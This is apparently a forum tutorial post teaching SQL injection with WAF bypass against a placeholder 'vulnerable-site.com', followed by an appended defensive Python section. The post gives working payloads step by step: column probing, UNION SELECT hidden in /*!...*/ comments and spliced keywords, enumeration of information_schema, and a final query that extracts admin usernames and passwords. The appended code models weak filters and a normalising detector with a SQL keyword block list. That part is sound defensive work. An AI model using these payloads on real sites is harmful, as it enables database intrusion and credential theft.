WAF BYPASS Tutorial 10-28-2012, 04:37 PM
#1
Hi guys,
So I will show you how to do WAF bypass (I'm still a beginner). Hope someone will find this useful.
So a WAF (Web Application Firewall) is a filter inside a website that doesn't allow commands like union select, group_concat, etc.
In this tutorial I will show you how to bypass that filter (firewall) and get useful info from the website. It's not that easy, but with a lot of practice it will get easier for you.
So let's begin.
What you will need for this tutorial is:
Vulnerable site
Basic knowledge of SQLi
Text to hex converter
Now, for example, our site will be this one:
Code:
http://www.vulnerable-site.com
So let's find the vulnerability. When you find it, it will look something like this:
Code:
http://www.vulnerable-site.com/index.php?id=88'
When you add ( ' ) at the end you will get an error. So now let's use the command order by or group by or any other method (command) to find how many columns there are.
So let's continue.
Code:
http://www.vulnerable-site.com/index.php?id=88 order by 1--
No error, but if your command gets filtered and you get a forbidden page, just add this:
Code:
/*!order*/ /*!by*/ 1--
Now let's raise number 1 to 2. It's the same command and we get the same thing, no error.
3----> no error
4----> no error
5----> no error
6----> error.
Our site has 5 columns. Now we need to find the vulnerable column number. Lots of sites are getting filtered here on this command. But let's try:
Code:
http://www.vulnerable-site.com/index.php?id=88 union select 1,2,3,4,5--
Yeah, our command got filtered. The best way to see which part of the command is filtered is to use the source of the site.
Now let's bypass this filter:
Code:
http://www.vulnerable-site.com/index.php?id=88 /*!union*/ /*!select*/ 1,2,3,4,5--
If you are still getting a forbidden page you can use lots of codes to bypass that.
You can even combine codes.
Here are some of them:
Code:
/*!union*/ select
UNIunionON SELselectECT
uni>on sel>ect
etc
etc
So our code bypassed our filter and we got the vulnerable column number. It's number 2.
So now let's find tables from the vulnerable number.
Code:
http://www.vulnerable-site.com/index.php?id=88 /*!union*/ /*!select*/ 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--
Again we got filtered. This time it's group_concat and information_schema. So it's the same procedure. Use /*! */ and you should get it to work.
Let's try:
Code:
http://www.vulnerable-site.com/index.php?id=88 /*!union*/ /*!select*/ 1,/*!group_concat*/(table_name),3,4,5 from /*!information_schema*/.tables where table_schema=database()--
Yes, we got our table. Now find a table something like admin, users, login, etc.
You can use LIMIT 1,1 before -- and just raise 1,1 to 2,1, etc. to get the table.
OK, so now that we have found our table (admin), let's get columns from it.
The code is the same, but we will change something. Use a text to hex converter to hex your table.
Code:
http://www.vulnerable-site.com/index.php?id=88 /*!union*/ /*!select*/ 1,/*!group_concat*/(column_name),3,4,5 from /*!information_schema*/.columns where table_name=0xHEX OF TABLE--
You need to use 0x before the hex in order for it to work.
So now we should get our columns from the table admin.
They are username and password. Now let's get them.
Code:
http://www.vulnerable-site.com/index.php?id=88 /*!union*/ /*!select*/ 1,/*!group_concat*/(username,0x3a,password,0x0a),3,4,5 from admin--
Now you should get the admin username and password. Hope this will help. If there are mistakes please tell me. Sorry for my bad English. This is just the basics; there is more to show about WAF.
-Crow
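Added here from the defender's side (example code written for this page, not part of Crow's post): the post's two tricks, MySQL `/*!...*/` version comments and spliced keywords like UNIunionON, both beat a WAF that matches the raw request text or "cleans" it by deletion. The Python below models those weak filters beside a normalise-then-reject check fed the post's own payload strings; the function names are made up, and the `\d*` in the comment regex also covers versioned `/*!50000 ... */` comments, which the post does not use.

```python
import re

# Keywords the post's WAF filters; the phrase form is the weak signature
# that "/*!union*/ /*!select*/" slips past.
BLOCKED = ("union", "select", "group_concat", "information_schema")
PHRASE = re.compile(r"union\s+select", re.IGNORECASE)

def naive_phrase_filter(query: str) -> bool:
    """Weak WAF #1: match the literal phrase 'union select' in the raw text.
    Returns True when the request would be blocked."""
    return PHRASE.search(query) is not None

def naive_strip_filter(query: str) -> str:
    """Weak WAF #2: 'sanitise' by deleting each blocked keyword once and
    forwarding the remainder. "UNIunionON SELselectECT" works against this
    because the deleted piece leaves the real keyword behind."""
    for kw in BLOCKED:
        query = re.sub(kw, "", query, flags=re.IGNORECASE)
    return query

def normalize(query: str) -> str:
    """Rewrite the request the way MySQL will read it, before matching.
    /*!...*/ (and /*!50000 ...*/) version comments are executed, so their
    body is kept; ordinary /* ... */ comments vanish; whitespace and case
    collapse."""
    q = re.sub(r"/\*!\d*(.*?)\*/", r"\1", query, flags=re.S)
    q = re.sub(r"/\*.*?\*/", " ", q, flags=re.S)
    q = re.sub(r"\s+", " ", q)
    return q.strip().lower()

def has_blocked_keyword(text: str) -> bool:
    """Whole-token match, so 'reunion' is not flagged but 'union' is."""
    return any(re.search(rf"\b{kw}\b", text) for kw in BLOCKED)

def detect(query: str) -> bool:
    """Defender's check: normalise first, match whole tokens, and also flag
    input where one pass of keyword deletion uncovers a keyword (the splice
    trick). The decision is block/allow only; nothing is rewritten and
    forwarded to the database."""
    norm = normalize(query)
    if has_blocked_keyword(norm):
        return True
    return has_blocked_keyword(naive_strip_filter(norm))

if __name__ == "__main__":
    # Constructed inputs: the three payload shapes used in the post above.
    for q in ("88 union select 1,2,3,4,5--",
              "88 /*!union*/ /*!select*/ 1,2,3,4,5--",
              "88 UNIunionON SELselectECT 1,2,3,4,5--"):
        print(f"{q!r}: phrase_filter={naive_phrase_filter(q)} detect={detect(q)}")
```

The two payloads the post uses to get past the filter return False from the phrase filter but True from detect, while a plain id or the unfiltered order by probe stays allowed.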